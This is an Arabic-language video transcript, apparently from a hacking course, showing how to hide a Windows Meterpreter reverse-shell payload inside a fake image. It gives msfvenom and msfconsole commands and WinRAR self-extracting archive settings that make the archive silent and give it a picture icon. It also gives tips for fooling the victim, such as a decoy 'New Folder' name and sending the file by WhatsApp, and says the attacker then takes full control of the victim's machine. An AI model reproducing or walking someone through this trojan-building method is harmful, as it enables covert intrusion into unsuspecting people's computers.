اهلا بيكم. اول حاجه هنعملها وهي ان احنا هننزل المتطلبات اللي احنا محتاجينها في الشهر. برنامج الوينرير هندخل على المتصفح عندنا وننزله، او هسيب لكم اللينك في التليجرام. تاني حاجه هنستخدمه هو موقع كونفرت ايكون، ده اللي هيحول الصوره بتاعتنا من صيغه البي ان جي لصيغه الايكون. هنجيب اي صوره ونحطها هنا في ملف الابلود ده، ندوس هنا كليك هير ونختار الصوره. هيقعد حوالي 30 ثانية يضغط الصورة ويحولها، وبعدين ندوس على داونلود وننزل. تمام كده. بعد ما عملنا الخطوتين دول هنروح للكالي بتاعنا ونعمل البايلوت اللي هندمجه. هنيجي كده على سطح المكتب في اللينكس، دوس كليك يمين وبعدين اوبن تيرمينال هير. هنكتب الامر ده sudo msvnum-b windows/meterpreter reverse tcp. الهوست انا كاتب هنا الهوست الداخلي لان بعمل اي تجارب في الكورس على نفسي، وعشان نعرف الهوست الداخلي نروح على اي تيرمينال ونكتب ifconfig. هنا ظهر لنا الاي بي، والاي بي ده هنستخدمه في الاتصال الداخلي. لو عايزين نعمل اتصال ببورت خارجي كنا نزلنا فيديو عنه وقلنا ازاي نفتح بورت في الراوتر ونعمل اي بي خارجي، وعرفنا كل حاجة بالتفاصيل. عشان نعمله اتصال خارجي خارج الراوتر بنجيب البورت اللي احنا فتحناه او الاي بي اللي احنا فتحناه وبنحطه مكان بنحطه في الايل هوست مكان الداخلي ده. طبعا البورت احنا هنا بنستخدم 8080. ندوس انتر بعد ما نخلص الكود ونكتب الباسورد. نسيبه دقيقتين لحد ما يخلص تماما معانا. كده يكون البايلوت بتاعنا اتعمل وكله تمام. نجيبه كده من الكالي لينكس وهنزله عندي لسطح المكتب بتاع بعد ما نزلت الملف لسطح المكتب حطيته هو والصورة في الملف ده. دي صورة بصيغة البي ان جي مش الايكون. الصورة دي اللي هي بصيغة البي ان جي، صورة عادية تماما. اجي كده احدد الملفين، كليك يمين واد تو ارشيف. نقول تاني لازم نكون محملين برنامج الوينرير ده اللي اصلا اللي احنا شغالين عليه. اهم حاجة كده الاعدادات نعمله بصيغة الرير. الكومبريشن هنخليها بيست، والسايز هنخليه 256 وهنعملها كرييت SFX ارشيف. نيجي على تاني حاجة الادفانسد، وهنا نخلي او نعمل اسم للملف مش اسم الصورة، اسم الفولدر. انا هسميه نيو فولدر. وده يا جماعة لان اول ما الشخص يدوس على الصورة بتعمل فك ضغط عنده، فلما نعملها له نيو فولدر فهنا في اغلبية او في احتمالية كبيرة انه يكون عنده ملفات تانية اسمها نيو فولدر وبالتالي ما ياخدش باله منه اصلا. الخطوة التانية على السيت اب، هنيجي على السيت اب وهنا بنكتب اسم الملف. اول حاجة اسم الصورة اللي هي TWM ونعمل لها صيغة البي ان جي. تمام. وتاني حاجة التطبيق twm3.exe. عشان نتأكد من الموضوع ده ندوس على الصورة كليك يمين ونروح لبروبرتيز، وهنا هنلاقي اسم الصورة والصيغة بتاعتها. نيجي برضه على التطبيق بروبرتيز وهنلاقي اسم التطبيق والصورة. هنروح للموديلز وهنخليها هايت اوف. الادفانسد مش هنحتاج فيه هنا حاجة. الابديت هنخليه override all files، تاني اختيار معانا. text and icon
الخطوة دي من اهم الخطوات، وهي ان احنا هندمج البايلوت والصورة داخل ايكون. هنيجي على ال SFX ايكون براوس عشان نحدد مكان الصورة. الايكون اللي احنا نزلناها يا جماعة هي دي، وهتلاقوني هنا يعني هتلاقوا في الطيب الصيغة بتاعتها ايكون. اهم حاجة نتأكد من الصيغة دي وندوس اوكي. هنا هنرجع كل حاجة وبعدين اوكي، وكده الصورة تكون اتدمجت هي والبايلوت بايكون. بالمناسبة الايكون ده بيكون سهل عليه جدا السنت فور مسج واتساب. هنرجع لللينكس تاني، والامر اللي هنكتبه ده هو الامر اللي هنعمله بعد ما ندوس على الصورة. يعني اول ما ندوس على الصورة او اي شخص يدوس على الصورة وتتفتح، احنا هنا بنجهز الليسننج بتاعنا. نكتب سودو MSF console وبعدين الباسورد. هنسيب كده الاداة تشتغل معانا. تمام كده فتحت الأداة. نستخدم نكتب use exploit /multi/handler، بعدين set pilot windows /meterpreter/reverse. واخر حاجة TCP وندوس على هنا. اهم خطوة ان احنا بنتأكد الكود بتاعنا صح او في اي مشاكل معانا ولا لا. نكتب show options، وهنا هنلاقي ان الهوست بتاعنا لسه ما اتكتبش، والالبورت مكتوب 4 4، واحنا مش بنستخدم الاربع اربعات. فهنكتب تحت set الهوست، ونكتب الهوست اللي احنا استخدمناه في البايلوت اللي عملناه اللي هو الداخلي الخاص بي انا. البورت برضو اللي هو 8080، وبعدين نكتب show options. الكود خطأ، نكتب اس. تمام كده الهوست تمام والبورت تمام. اكسبلويت، وبكده يكون الليسننج بتاعنا جاهز تمام. اول ما الشخص يدوس على الصورة ويفتحها الليسننج هيقرأ معانا هنا. والفيديو بتاع انشاء بايلوت هتلاقوه على القناة. عرفنا ازاي نتحكم تماما في الجهاز بعد ما يفتح البايلوت، وعرفنا ازاي ناخد كل الصلاحيات. لحد هنا اكون انا خلصت. اشوفكم في الفيديو الجاي. سلام.